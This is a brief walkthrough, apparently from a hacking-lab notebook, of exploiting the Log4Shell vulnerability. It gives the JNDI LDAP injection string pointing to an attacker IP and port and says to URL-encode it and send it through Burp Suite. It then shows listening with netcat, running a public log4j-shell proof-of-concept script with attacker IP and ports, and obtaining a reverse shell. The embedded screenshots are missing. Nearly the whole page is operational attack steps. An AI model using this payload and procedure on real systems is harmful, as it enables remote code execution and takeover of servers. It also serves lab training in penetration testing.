🦪Log4Shell
Check this article for more info To check for Log4Shell exploit :
${jndi:ldap://10.8.0.178:4444/a}
Then url encode it and send through burp after intercepting:

Listening on nc:

We get some weird characters back.
Then we can use a log4j-shell Download java and execute
python3 poc.py --userip 10.8.1.208 --webport 8000 --lport 9001
Then send the payload:

Sending the url encoded payload in burpsuite.
Now we get a shell back:

Last updated
Was this helpful?